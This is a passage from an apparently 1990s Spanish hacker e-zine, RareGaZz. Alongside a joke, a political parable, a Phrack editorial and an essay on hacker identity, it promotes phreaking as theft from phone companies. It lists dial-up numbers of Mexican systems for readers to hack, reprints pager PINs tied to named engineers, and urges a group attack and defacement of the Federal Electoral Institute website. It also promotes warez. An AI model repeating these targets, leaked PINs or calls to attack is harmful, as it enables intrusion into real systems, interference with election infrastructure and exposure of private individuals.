 programas valiosos y sistemas.
          -- Okay, Windows hace eso tambien!
 Los virus haran ocasionalmente sospechar a el usuario que su sistema es
 demasiado lento y el usuario comprara nuevo hardware.
          -- Yup, eso tambien es Windows.


 Hasta ahorita parece que Windows es un virus pero hay algunas diferencias
 fundamentales: Los virus estan bien apoyados por sus autores, pueden ser
 ejecutados en la mayoria de los sistemas, su codigo de programacion es
 rapido, compacto y eficiente, ademas tienden a hacerse mas sofisticados
 conforme maduran.

 Asi que Windows *NO* es un virus.

 Es un error. (bug)

 Autor: saarm@netvision.net.il
 Traduccion: RareGaZz

..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..
========================================
[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]
 
                            ()()()()()()()()()()()
                            ()  Los vendedores  ()
                            ()        y         ()
                            ()   el Anacoreta   ()
                            ()()()()()()()()()()()

            Homero Roa era un ermitao que no sabia nada del mundo...

 Pero alla en la ciudad, lejos de su cabaa, vivian dos vendedores, vendedores
 de FELICIDAD.-Cada uno representaba una felicidad distinta, por lo tanto,
 eran rivales.

 La felicidad de uno se llamaba Capitalismo.  (Elmer Zig)
 Y el otro llamaba a su sistema de felicidad: Comunismo. (Fedor Zag)

 Cada uno de ellos sabia que ganar a Homero Roa para su causa seria un gran
 triunfo ya que Roa representaba la pureza, la neutralidad y el desinteres...

 Y asi el anacoreta comenzo a recibir inesperadas visitas.

 "Nuestro sistema para lograr la felicidad es el mejor."-Dijo Elmer Zig

 "Todo lo que usted tiene que hacer es ser de los nuestros y lo tendra todo."

 "Primero se baa, se rasura, se viste de hombre de negocios y obtiene un
 empleo con un salario fijo..."

 "Ahora es usted un caballero y entrara triunfante en el mundo occidental - El
 mundo del dinero le dara toda la dicha que anhela..."

 "Usted tiene un empleo, Homero Roa.- Ese empleo le da un salario y una
 seguridad.- Con el ahorro, que es otro de nuestros inventos, usted
 prosperara."

 "Tiene una hora para almorzar.-Puede correr a la fonda... buscar un
 asiento... pedir un 'sandwich'...fumar un cigarrillo...y volver al trabajo."

 "Pero lo mejor del dia viene ahora: a orillas de la ciudad esta el nido de
 amor que usted paga en comodos plazos; ahi su bella mujercita le espera...y
 los retoos!"

 "La cena esta lista - platillos copiados del 'Lady's Home Journal', Que
 delicia! - Su dulce suegra, miembro del comite de damas caritativas, esta a
 la mesa."

 "No hay nada como la vida familiar en Occidente.-Usted es padre de familia -
 Es el jefe.- Pero Apresurese la cena, pues sigue lo mejor del hogar LA
 TELEVISION!"

 "La television es el mejor substituto del pensamiento. Si usted quiere gozar
 de ella, ponga su cerebro en blanco.-No Piense!"

 "Los programas de t.v. estan hechos para retrasados mentales.- Cierto, pero
 no se ofenda.- Usted es uno de ellos solamente cuando ve tales programas."

 "La television piensa por usted; le dice que cigarrillos debe fumar y que
 licor debe beber.- Todo lo que toca lo vuelve mediocre, pero evita la
 molestia de pensar..."

 "Mi camino a la felicidad -Siguio diciendo Zig- esta lleno de comodidades.-
 El 'confort' es nuestra especialidad".

 "Autos que se manejan con botones.- Calefaccion central. Cobertores
 electricos... O radios de transistores, muy utiles para anacoretas que viven
 en las montaas.- Ademas, periodicos con tiras comicas y una seccion a
 colores los domingos."

 "Y lo que es mejor: Todo esto se lo damos a usted AHORA y lo paga en 20
 aos."

 "Pero apresurese a aceptar, pues es una oferta limitada; tal vez *NO* alcance
 para todos.- El sistema capitalista es bueno para los que lo aprovechan.-
 Acepta Usted?"

 El asceta quedo pensativo...luego dirigio una larga mirada a Elmer Zig y
 dijo:

 "NO!- NO ACEPTO. Primero debo conocer la oferta de la competencia."

 Zig quedo atonito.- Zag entro en accion como super vendedor de la parte
 contraria. De lejos notaba que Zig y Zag habian leido dos versiones distintas
 del "arte de vender".

 Pero -despues de todo- el producto hace al vendedor y el producto de zag era
 dicha comunista...Roa escucho...

 "Nuestro sistema produce felicidad para usted y para las generaciones
 futuras"- Comenzo diciendo Zag.

 "Si se afilia a nuestra causa tendra toda la dicha que le ofrecemos..."

 "En primer lugar se baa. se rasura, se viste de obrero y obtiene un trabajo
 con salario fijo."

 "Ahora es nuestro 'camarada' y entrara triunfante en el mundo socialista.-
 Veamos que clase de dicha le ha reservado el partido..."

 "Ya es usted un obrero y tiene un salario.- De su seguridad futura se ocupara
 el partido.- Con disciplina, que es uno de nuestros requisitos, sera un
 obrero feliz."

 "Tiene una hora para almorzar; corre al refectorio de la fabrica... Busca un
 asiento...pide un 'borscht'...fuma un cigarrillo...y vuelve al trabajo."

 "Pero viene lo mejor: a orillas de la ciudad el estado posee una casita
 habitada por usted - ahi lo espera su bella esposa y camaraditas."

 "La cena esta lista: platillos aconsejados por el comisariado de alimentos;
 QUE DELICIA! - Su suegra, que es miembro de la policia secreta, esta a la
 mesa."

 "No hay nada como la vida familiar en el socialismo.- El estado es jefe de la
 casa y lo releva a usted de problemas.- y ahora, una sorpresa: LA TELEVISION
 SOCIALISTA!"

 "La television comunista tambien sustituye al cerebro, pero en forma mas
 definitiva.- Sabemos que el pensar hace infeliz al hombre y aqui lo queremos
 feliz a fuerzas."

 "Si la television occidental vende muchos productos, la television nuestra
 vende solo uno: COMUNISMO.- Esto parece aburrido, pero no lo es..."

 "Aqui no aconsejamos que cigarrillos fumar, sino que actitud debe tomar ante
 la vida.- Y eso es mejor; ahorra esfuerzos..."

 "Nuestro camino a la dicha esta lleno de satisfacciones; luchar por el
 Estado, trabajar para el Estado, hacer politica y ser el Estado..."

 "Cambiar de opio a los pueblos, conquistar el espacio, emancipar a las
 masas."

 "El comunismo emancipo al proletariado, que antes era mayoria,
 conviertiendolo en minoria dirigente, por eso esta es 'La Dictadura del
 Proletariado'."

 "De acuerdo con nuestro plan, usted paga AL CONTADO y se olvida de
 preocupaciones economicas - Y los beneficios los recibe a plazos...en 20
 aos.- Con justicia social el comunismo alcanzara en comodidades a occidente
 en ese plazo...Acepta Usted?"

 El hermitao penso: "Y por medio del capitalismo occidente piensa alcanzar al
 comunismo en justicia social...tambien en veinte aos.".- Hubo un silencio y
 luego, dirigiendose a ambos, dijo:

           "Lo siento, NO puedo aceptar ninguna de las dos ofertas."

 "Sus sistemas han sido diseados para el hombre ordinario y creo que los dos
 cometen un error: El hombre ordinario NO EXISTE.- Todos somos diferentes."

 "Por ejemplo, yo vivo solitario por que me gusta; no encuentro placer en la
 civilizacion que me ofrecen, no me importan ni el bao ni la ropa..."

 "Parezco ser el mas pobre de los pobres, pero no busco un empleo, ni un
 salario, ni un jefe...tengo menos que nadie, comunistas y occidentales, pero
 tengo mas independencia que ambos..."

 "No quiero pagar por una casita a plazos ni quiero que el Estado la pague por
 mi.- Esto parece extrao, pues representa el sueo de todo Burgues y, en una
 u otra forma, los dos sistemas aspiran a la Burguesia..."

 "Pero mi ejemplo solo prueba que TODOS los hombres somos diferentes."

 "Y para finalizar, les dire que la felicidad que me ofrecen yo ya la
 consegui -; Por ella no pague nada, ni al contado ni a plazos.- Solamente
 QUISE ser feliz...y lo SOY."

 Aqui termina esta historia, aunque hay quien dice que ahora, en lo alto de
 las montaas, no hay un anacoreta, sino tres: HOMERO ROA, ELMER ZIG Y FEDOR
 ZAG.

           [ Este texto muestra una parte del espiritu de RareGaZz ]
                 [ Educar - Fomentar el razonamiento - Crear ]

..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..
========================================
[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]

                         ****************************
                          *        phreaking       *
                           *        tutorial      *
                            ***********************

 Que es Phreaking?
 ------------------

 Phreaking es cuando le robas dinero a la compaia telefonica para hacer
 llamadas de larga distancia o locales gratis. Esto puede ser hecho de
 distintas maneras. Phreaking es 100% ilegal pero eso nunca nos ha detenido.

 Como haces phreak?
 ------------------

 Existen 3 formas de joder a las compaias telefonicas:

 1. Cajas de colores (azul, purpura, etc.)
 2. Usando at&t, mci, etc. sin pagar.
 3. "Trucos del negocio"

 Cajas de colores
 ----------------

 Un boton de pulso trabaja por que emite tonos de distintas frecuencias.
 Cambiando las frecuencias puedes hacer cosas interesantes. Los phreaks que
 han estado haciendo esto tienen aparatos llamados 'cajas'. Aqui hay una
 descripcion breve de algunas...

 Tipo de Caja
 ------------

 color                   funcion
 ~~~~~                   ~~~~~~~
 azul                 Todas las llamadas por el precio de una local.
 purpura              Todas las llamadas gratis!
 plateada             Llamadas gratis,etc. La armada de EUA las usa.
 Caja de sonidos      Hace los sonidos de cuando las monedas caen al telefono.
 Caja que queso       Hace las llamadas imposibles de localizar.

   [ Texto enviado a nosotros por alguien que lo tradujo Ingles - Espaol ]

..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..
========================================
[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]


                              ==Phrack Magazine==

                Volume Seven, Issue Forty-Eight, File 2 of 18

                               Phrack Editorial

          ----------------------------------------------------------
                             Exclusiva de RareGaZz
          ----------------------------------------------------------

 Esta probablemente sea mi ultima editorial aqui en Phrack asi que como ya
 no estare en el rol de editor, se me ocurrio que terminare con mi crusada
 de hacer enojar al mundo entero.

 No me gusta ninguno de ustedes gente. La subcultura del hacking se ha
 convertido en un chiste de lo que fue. La gente puede argumentar que la
 comunidad ha "evolucionado" o "crecido" de alguna manera, pero eso es
 pura basura. La comunidad ha degenerado. Se ha convertido en una fuerza
 alimentada por los medios de comunicacion. El acto de desafio intelectual
 que representaba el hacking ha sido reemplazado por codicia, ganas de
 reconocimiento y mal-acomodado por post-adolescentes.

 DefCon IV epitomizo este cambio con un sorprendente detalle, que solo puedo
 tener esperanzas de ponerlo en palabras correctamente. Imagina el bastardo
 offspring de Lollapalooza y una convencion Star Trek. Imagina 300+ gentes
 fuera de sus casas, lejos del ojo guardian de sus madres por primera vez
 en sus pateticas vidas. Imagina esa misma gente con el ego de Rush Limbaugh
 y las habilidades sociales de Jeffrey Dahmer, equipados con laptops con
 programas que ellos no pueden usar, y hablando con reporteros de tecnicas que
 ellos mismos no entienden. Bienvenido a DefCon.

 Si yo tuviera que juzgar a la comunidad de hackers por los resultados de
 esta conferencia, mi prognosys seria "Terminantemente enferma".

 Pareceria que "hacking" sea convertido en el siguiente paso logico para mucha
 gente buscando algo con que vengarze de "algo". "Bien, gee, Ya me he
 agujerado todas las partes de mi cuerpo y pintado el pelo color azul...que
 mas podria hacer para impactar a mis padres? Ya Se! Voy a meterme a algun
 sistema federal y quizas ponga mi nombre en el periodico THAT WOULD BE COOL!
 Sera como la pelicula!"

 Odio tronar la burbuja de todos, pero estan jodidos.

 En estos dias, realmente no tienes que hacer nada ilegal para ser un hacker.
 Esta al alcance de cualquiera aprender mas, y usar computadoras mas poderosas
 legalmente que nosotros en los 70's y 80's algun dia soamos. En esos
 tiempos, era TODO sobre entender como usar estas cosas locas llamadas
 computadoras. Habian cientos de diferentes tipos de sistemas, cientos de
 diferentes redes, y todos empezaban desde cero. No habia ningun medio publico
 de acceso a la informacion; no habia libros en tiendas o gabinetes de
 librerias con arcanos comandos y sintaxes; no habia clases para las personas
 civiles. Estabamos fuera.

 Afrontados con estos obstaculos, jovenes normales, inteligentes, avidos de
 conocimiento intentaron ganar acceso a estas fascinantes maquinas a traves
 de cualquier medio posible. Simplemente no habia otra forma. No habia leyes,
 y a pesar de eso todos sabiamos que tenia algo grotesco. Este hecho aadio
 un simple 'rush' al break-in (ataque), pero el objetivo principal era
 simplemente aprender.

 Ahora, con la mayoria de los sistemas operativos basados en UNIX, y la
 mayoria de las redes siendo basadas TCP/IP la cantidad de conocimientos
 necesaria para un hacker ha disminuido notablemente. Con los increiblemente
 bajos precios de las computadoras caseras, y la libre disposicion de
 complejos sistemas, la necesidad de break-in en sistemas remotos en orden
 de aprender ha sido removida. Ahora los unicos incentivos podrian ser vender
 la informacion robada, el rush sicologico que se experimente al tener el
 control de un sistema y salirse con la suya. Buscar metas mas altas en el
 caso de entrar a sistemas, ahora solo nos lleva a la carcel.

 No hay nada absolutamente cool en ir a la carcel. Conozco a demasiada gente
 que esta en la carcel, que han estado en la carcel, y algunos que estan a
 punto de terminar en ella. Confien en mi cuando digo esto gente. No seras
 respetado por nadie si actuas por las simples emociones y terminas en
 la carcel. De hecho todos tus "amigos" pensaran que eres un tonto por ser
 tan descuidado...hasta que ellos tambien sean capturados.

 Te detienen y seguramente pasaras algun tiempo en la carcel. A pesar de que
 te liberen, perderas tu pasaporte y tu habilidad de viajar libremente,
 perderas la habilidad de hacer negocios en ambientes clasificados, no podras
 ser empleado por la mayoria de las compaias y hasta perderas tus derechos
 de usar computadoras o equipo de red por aos. Aun vale la pena?

 La recompensa ha disminuido y los riesgos han aumentado.

 Hacking no es acerca de cometer un crimen. No necesitas ser criminal para
 ser un hacker. Andar con hackers no te hara un hacker asi como andar con
 doctores en un hospital te hace doctor. Usar camisetas de hackers no
 significa que aumentaras tu inteligencia o posicion social. Ser cool no
 significa tratar a todos como mierda, o pretender que sabes mas que los
 demas.

         Desde luego, Yo soy un amargo viviendo en el pasado, asi que,
                             Que puedo  Yo saber?

                                 Erik Bloodaxe
                                 ~~~~~~~~~~~~~

            [ Entre musicos, poetas, locos y hackers te veas ... ]

..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..
========================================
[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]

                            
                                    
                                    
                              

                            Suplemento Vitaminico 
                                      por
                                   -= RdK =-

 Antes de empezar con el texto que nos enviaron para este numero quisiera
 decirles que el programa creado para encadenar remailers y encriptar los 
 mensajes usando PGP (o sin el) ya esta disponible en la seccion de WareZ de 
 nuestra pagina o sigue el siguiente link.
                 http://www.geocities.com/Baja/4426/REMAIL.ZIP
 Esta completamente en Espaol y viene con instrucciones de uso e instalacion.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

                        Numeros de Telefono Para Hackear

 Ciberneticos y descarriados amigos les tenemos algunos numeros de telefono
 localizados en 91-800 (gratuita la llamada :-) para que intenten sus dones
 de hackers y empiecen YA! a hackear sistemas mexicanos.

                           -=Sistema Mexicano SKYTEL=-
                             ~~~~~~~~~~~~~~~~~~~~~~~
                                   9180025451

                       Baud    Parity    Data-Bits    Stop-Bits
                       2400    None         8            1

 Username: ?????????
 Password: ?????????

 Cuando te conectes a este sistema aparecera CONNECT en tu programa de
 comunicaciones pero no habra respuesta del sistema. Tienes que enviar algunos
 breaks y presionar varias teclas hasta que en tu pantalla se muestre el
 siguiente texto que (segun yo) incluye la clave del login y password. Nota
 que cuando pasa sobre un nombre tu PC hara un pitido -en teoria-

------------------------------Comienza Output---------------------------------
        SE LES RECUERDA AL PERSONAL QUE TENEMOS SERVICIO DE SKYTEL
        PARA EMERGENCIAS, PARA REQUERIR DICHO SERVICIO.
                         MARCAR 91(800)72-345  LADA SIN COSTO
                                  O 
                                7642           MARCACION ABREVIADA
        CONTESTARA UNA OPERADORA QUE TRABAJA LOS 365 DIAS DE A#O Y 
        SOLICITARA UN # DE PIN LOS CUALES MOSTRAMOS A CONTINUACION:
                
                  # PIN 548-86-52 ING. DANIEL HERNANDEZ M.
                  # PIN 539-89-40 SR.  AGUSTIN AREY C.  
                  # PIN 539-89-41 ING. JORGE CHAVEZ C.  
                  # PIN 539-89-42 ING. JUAN MANUEL CORTES M.
                  # PIN 539-89-43 ING. ABEL AQUINO V.
                  # PIN 527-41-53 ING. DANIEL FRIAS R.
                  # PIN 527-41-54 ING. RAUL HERNANDEZ L.
                  # PIN 527-41-55 SR.  ENRIQUE MARTINEZ RAMOS.
                  # PIN 548-53-58 ING. JOSE LUIS GONZALEZ
                  # PIN 548-92-98 ING. JESUS FERNANDEZ R.
                  # PIN 548-92-99 ING. JOSE LUIS HERNANDEZ M.   
                  # PIN 553-32-16 ING. JOSE ANTONIO PITOL Z.
                  # PIN 553-32-17 ING. BRAULIO ALVAREZ H.
Username: 
-------------------------------Fin del Output---------------------------------

                            -=Telefonos del Noroeste=-
                              ~~~~~~~~~~~~~~~~~~~~~~
                                 337700 - Tijuana
                                 763301 - Ensenada
                                 ?????? - Rosarito
                                 ?????? - Mexicali

                                -=Cetys Ensenada=-
                                ~~~~~~~~~~~~~~~~~~
                                 745300 - Ensenada
                                 745301 - Ensenada
                                 745167 - Ensenada

                                -=Microsoluciones=-
                                 786031 - Ensenada

 SE SOLICITAN NUMEROS TELEFONICOS (CARRIERS) PARA ENTRAR A SISTEMAS !!!!
  MANDANOS EL NUMERO DE TU UNIVERSIDAD, PROOVEDOR DE SERVICIO, ESCUELA, ETC
               Y EL SCRIPT PARA REALIZAR LA CONEXION (login.cmd)

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

               Ŀ Ŀ Ŀ Ŀ       Ŀ Ŀ Ŀ
               Ĵ                    
                                   
                                ftp.cincos.net
                             Directorio: /incoming

 Lastima, el operador de este servidor se puso una encabronada por todo el
 WareZ que se estaba intercambiando en su sistema que decidio borrar *TODOS*
 los programas que estan en su directorio incoming. Ni modo.
 Los que aprovecharon consiguieron el PcCillin95, Viruscan95, PgpFone, entre
 otros programas groovys.

 Si descubren otro servidor donde se intercambie WareZ no dejen de avisarnos!

..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..
========================================
[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]

                                 ________________
                                 CTRL + ALT + DEL
                                 ~~~~~~~~~~~~~~~~
                    "Tu linea de comunicacion con el Underground"

 En esta seccion se incluyen anuncios, sugerencias, preguntas y todo aquello
 que sale sobrando en alguna de las otras secciones.

..............................................................................

                                   IMPORTANTE!

 CrackSmoker, lider temporal de RdK ha dado la orden a todos los miembros de
 RdK de intentar hackear el siguiente sistema: http://www.ife.org.mx para que
 el grupo gane popularidad y nos hagamos conocidos (mas) en toda la republica.
 Actualmente hay aprox. 50 integrantes de este grupo -la mayoria estudiantes
 de ciencias computacionales o algo relacionado con Pc's y redes- y todos
 trataran de hackear este sistema por lo que sera algo que probablemente SI
 logren.
 RareGaZz estara atento a modificaciones a ese sistema y les deseamos SUERTE!
 a todo el grupo para que logren hacer lo que se proponen. Que gane el mejor.
 RareTrip, KillerBot, Mr.X y LePompeItor trataran de no dejar abajo a los
 lectores de RareGaZz y haran todo lo posible para ser ellos los que entren
 y modifiquen ese sistema...imaginen nuestra grafica principal en ese sistema?

                                   CrackSmoker
                                     -=RdK=-
                   "Preparados para la Guerra y el Terrorismo"

                                     RareTrip
                                  -=RareDudeZ=-
                "Give us a system, we would give you the password"

 [ Para todos los despistados, www.ife.org.mx es la pagina del Instituto
   Federal Electoral donde se piensan poner los resultados de las elecciones.
   Nota aparte: Los lectores de esta revista tambien estan invitados a este
   gran concurso. El ganador recibira popularidad hasta por los FIU! en todo
   nuestro grupo y (probablemente) el mundo entero. raretrip ]
..............................................................................

                          Anuncia tu BBS en RareGaZz!
                          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
 Tienes una BBS y deseas ver el numero telefonico anotado en algun byte de
 esta revista? Pues envianoslo inmediatamente por que en algun proximo numero
 pondremos a la disposicion de todos la lista de BBS existentes en toda la
 republica mexicana! Si conoces el numero de alguna BBS mandalo para la
 publicacion de este articulo.

 Si tienes una BBS o pagina personal que tenga los numeros mas actuales de
 RareGaZz escribenos para incluir el numero/URL en todos los numeros de esta
 revista como 'sitio alternativo para conseguir raregazz' en caso de que
 Geocities este muy saturado.
..............................................................................

                             -=PIRATEAR RAREGAZZ=-

 En la revista "Internet World" numero 4 ao 3 aparece el articulo "9 consejos
 para proteger su privacia" muy parecido al articulo que aparecio en RareGaZz
 tiempo despues con el titulo "Como permanecer Underground" por Killerbot.
 Les copiamos? NO, Ellos nos piratearon el articulo! Lo hicieron a traves
 de un editor de otro magazine conocido al cual le enviamos el articulo con
 el titulo "Privacidad en Internet" para que lo publicara e incluyera nuestra
 direccion de correo para promocionar la revista. Tiempo despues se nos aviso
 que no iba a ser publicado lo cual aceptamos y enviamos nuestros sinceros
 saludos. Pero...Sorpresa! Aparece el articulo en otra revista *SIN* la
 direccion de RareGaZz y ademas mencionando como autor a otra persona.
 Ni modo :-(

 Pues bien, hace poco nos escribe un atento seor de Aguascalientes pidiendo
 permiso para publicar algunos articulos de RareGaZz en el periodico local El
 Heraldo. El permiso le fue dado y ademas ha sido alentado a hacerlo lo mas
 seguido posible siempre y cuando incluya una liga a nuestra pagina y/o la
 direccion de correo electronico de RareGaZz para promover nuestra pagina
 aun mucho mas.

 Moraleja: RareGaZz *SI* puede ser pirateado para revistas, periodicos,
 trabajos de la escuela, etc. siempre y cuando incluyan -POR LO MENOS- la
 direccion de correo de la revista y seria PREFERIBLE incluir la liga correcta
 a nuestra pagina.

 Si alguno de ustedes sabe de un periodico o revista que haya publicado un
 articulo nuestro sin mencionar a RareGaZz por favor avisen a la editorial
 (raregazz@bigfoot.com) y el reporte sera pasado inmediatamente a nuestro
 'equipo elite de contra-ataque' para que tomen las medidas necesarias en 
 contra de esa publicacion.

..............................................................................

                           -= Concurso de RareGaZz =-

 El concurso de RareGaZz para ver quien crea la mejor intro o el mejor logo
 de nuestra revista en arte ASCII/ANSI continua y esperamos la participacion
 de todos los artistas de ascii/ansi/programacion que esten interesados en
 un monton de premios que pensamos enviarle al ganador.

 A la lista de premios se incluyen los siguientes:

   - Quicktime (version mas nueva) y Quicktime VR para tu navegador.
   - Netscape Communicator 4.x
   - Un atractivo broche de Viva Zapata cortesia de KB.
   - Un libro nuevecito de el maestro Rius.

 Todo el software, la camiseta, los diskettes y el cargo por paqueteria suman
 mas o menos el gran total de $250 pesos en premios (y no en bonos del ahorro
 nacional) para el afortunado ganador. El minimo de participantes para que
 el concurso se lleve a cabo son 20. Las bases las puedes encontrar en 
 RareGaZz #3 junto con una lista de los otros premios.

..............................................................................


            Los links de su pagina los copiaron de la revista LINK ?

 Algunos -la mayoria- SI. Los links de esa revista nos evitan la molestia de
 andar poniendo bookmarks a cada sitio que veamos y a ustedes les ahorra una
 feria :-) asi que  Que hay de Malo ?

 Obviamente algunos links no los hemos copiado como la liga al sitio de McAfee
 donde puedes obtener los updates mas nuevos, la liga a los updates de f-prot,
 entre muchas otras ligas a paginas de hackers, etc.
 Muchas disculpas si esto le molesta a la editorial de esa revista, para
 compensarla ahi les va la siguiente SUPER LIGA de este mes (aja..)

                             http://www.link.com.mx
                                  (contentos?)
..............................................................................
 
      Podemos anunciar productos, servicios, paginas, etc. en RareGaZz ?

  SI !  Desde luego tendrian que mocharse con una feria por cada vez que 
 quisieran publicar sus servicios en nuestra revista. Algunos de nuestros
 lectores nos piden sugerencias de cual es el mejor proovedor de servicio de
 Internet, la tienda virtual con los mejores precios, etc. Asi que si se
 anuncian en esta revista de circulacion Nacional/Mundial y dejan una
 direccion donde los interesados puedan comunicarse con ustedes seguramente
 les ayudaria mucho a ellos (sin mencionar que ustedes conseguirian clientes).

 Obviamente no pensamos inundar la revista con anuncios pero uno o dos cada
 numero no creo daen a nadie y ademas seria la unica forma en que nosotros
 podemos ganar dinero de esta revista :-)

 Interesados? Comuniquense a nuestras direcciones y les diremos como hacer el
 pago y la cantidad que tendrian que aportar. Si ustedes los lectores tienen
 algo que decir respecto a esto esperamos sus opiniones. De cualquier forma,
 espero comprendan.

..............................................................................

                   Me podrian decir que significa H/P/A/V ?

 Muchas paginas de hackers tienen esa palabra en sus descripciones y simboliza

 H acking
 P hreaking
 A narchy
 V irii

 Servido joven...
..............................................................................

             Que buenos libros acerca de Internet me recomiendan leer ?

  TODA LA SERIE ARCO-IRIS ! En algunas partes de Internet encontraras los
 "rainbow books" que son gratuitos e incluyen todo tipo de informacion sobre
 redes e informatica. Desafortunadamente estos libros estan en Ingles y son
 un poco dificiles de conseguir.
 Los libros de la rainbow series fueron escritos por la National Computer
 Security Center (NCSC) para ayudar a los administradores de sistemas y
 profesionales a crear sistemas seguros que puedan ser confiados.
 Algunos que *yo* en lo particular he leido son los siguientes:

 Dark Lavender= Explica los metodos de distribucion de software para controlar
                la calidad y evitar que sus contenidos sean modificados.

 Brown= Esta es la guia para crear un sistema "de confianza" o seguro.

 N_Orange= Es la guia para comprender el control discrecional del acceso a
          sistemas seguros.

 Orange1= Criterios para la evaluacion de un sistema seguro.

 Orange2= Es un manual para comprender el control de la configuracion de los 
          sistemas seguros.

 Purpura= La guia para la verificacion formal de los sistemas.

 Rojo= Criterios para la evaluacion de una red segura y sus componentes.


 Este mes en nuestra pagina podras obtener el libro Brown en nuestra seccion
 de WareZ. El mes proximo pondremos otro libro y asi los estaremos rotando
 para ahorrar espacio en la cuenta de Geocities. Tu puedes coleccionar ( y
 desde luego, leer ) estos libros para aumentar tu conocimiento en forma MUY
 considerable -ingles necesario-.

..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..
========================================
[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]
 
                   Sobre Hackers, Crackers, Elites y LamerZ
                                 Por: RareTrip

 Esto es algo que me siento obligado a decir por la rapida aparicion de
 supuestos hackers en la red. Ponganse atentos o no lo lean...

 Ser hacker que es?  Es acaso memorizar firmas de algun hacker conocido como
 'todos contra el capitalismo' o 'abajo el gran hermano'? Es un hacker el que
 se niega a compartir informacion?  Es un hacker el anti-social escondido en
 el refugio de su habitacion? Lo siento, pero ese seria mejor catalogado como
 un Lamer.

 No quiero decir que una persona que no se sienta confortable con las masas o
 grandes cantidades de gente sea un lamer (Oh No), al contrario, estas 
 personas han descubierto que lo importante no es andar en la bola sino 
 disfrutar el silencio (depeche mode:-). Tampoco es un lamer aquel que sienta
 el impulso de crear y el rush de pensar cuando este solo en su habitacion,
 no me entiendan mal por favor, un lamer es quien esta solo por que no le 
 queda de otra. Una persona sola por conviccion es, para mi, alguien super
 respetable. Alguien que logro separarse de la sociedad para empezar con
 algun acto creativo y nuevo es un hacker, un verdadero hacker.

 Un hacker no quiere ser reconocido en la calle como hacker o anti-social, un
 hacker quiere -en lo posible- pasar desapercibido para que nadie moleste sus
 pensamientos. Un hacker con pelo azul y aretes en la nariz no es otra cosa
 que alguien que necesita ayuda, y pronto.

 Un lamer es aquel aspirante a hacker que quiere ser hacker sin esforzarse en
 absoluto.  Un lamer no aspira a tener filosofia propia y se conforma con
 chupar toda una forma de pensar y actuar de algun super-hacker al que admire.
 Un lamer si no tuviera computadora se conformaria con ver television todo el
 dia para despues, aspirar a ser un Batman, Superman o cualquier otro caracter
 ficticio pensando que solo necesita la capa para volar.

 Sabes quien es RareTrip? Para aquellos que me confundan con un seor de 40
 aos o un nio de 15 dejenme decirles que raretrip -al contrario de la
 persona que lo ha creado- no tiene edad, no tiene sexo, y tampoco tiene
 nacionalidad; es tan solo un IDEAL de alguna persona que trata de proyectarlo
 bajo un pseudonimo para hacer un sketch de alguien que quisiera ser. Yo, la
 persona y ser viviente que creo a raretrip no salgo a la calle vestido como
 hacker y con una camiseta con mi handle en letras grandes. Raretrip permanece
 guardado en mi cabeza mientras vivo la parte de mi persona humana, cuando
 regreso en frente de mi computadora...raretrip aparece de nuevo.

 Todos nosotros tenemos un ideal maximo o algo que nos gustaria llegar a ser;
 pues para mi es raretrip. Por eso le doy vida y moldeo sus ideas. No para
 hacerme elite o mejor. No pienso mejorar mi personalidad simplemente por ser
 raretrip, ni tampoco ganar mas amigos por que ya soy elite. Es como el nerdo
 que nunca tuvo amigos hasta que se quito los lentes...asi son los nuevos
 hackers. Asi nunca he tratado de ser yo.

 A todos ustedes les recomiendo esto:

 -Olviden su handle en su vida cotidiana.- No seamos hackers para hacernos
  famosos, no queremos ganar popularidad o fama siendo hackers. Eso si,
  queremos ganar conocimiento - y claro, chicas guapas :-) -

 -Tengan su vida aparte de la de su handle.- Algunas personas se asombran de
  lo bien informado que estoy pero eso tiene una simple explicacion "No
  siempre soy raretrip". Crees tu que si llego con alguien desconocido
  diciendo 'hola, soy el editor de raregazz y miembro de RdK' me tratarian
  mejor que si dijera 'hola, soy paco-gerte, me gustan las computadoras y
  siento simpatia por las redes'. Ni por un momento. La gente tiende a
  rechazarte si piensan que sabes mas que ellos, por eso olvida tu handle y
  ten tu verdadera personalidad a mano. Entre mas personas conozcas usando tu
  verdadera identidad mas informacion podras usar para tu handle, en mi caso,
  raretrip.

 -No se vendan a nadie.- Nunca copien las actitudes de ninguna persona, aqui
 en raregazz nos podremos ver como las personas mas keewwl de i-net pero te
 aseguro que si me vez en la calle no voltearias a verme, y seguramente  yo
 no voltearia a verte. Como te estas dando cuenta la imagen que tienes de mi
 es por mis ideas y forma de pensar, no por ser elite o hacker. No quiero ser
 heroe o enemigo de nadie simplemente por mi handle.

 Yo conosco por fortuna a dos de mis mejores compaeros de hacking, pero no
 siempre es asi. Si no conoces a los hackers con los que usualmente hablas
 por email -creeme- es mejor. LePompeItor ha sido amigo mio desde hace tiempo,
 entre los dos hemos hecho desmadre en borracheras y loqueras que solo 
 nosotros podemos llegar recordar, por eso hay aqui en raregazz un ambiente de
 camaderia y no de competencia. Estan invitados a formar parte de este
 ambiente todos los que quieran, no necesitan ser filosofos o expertos en
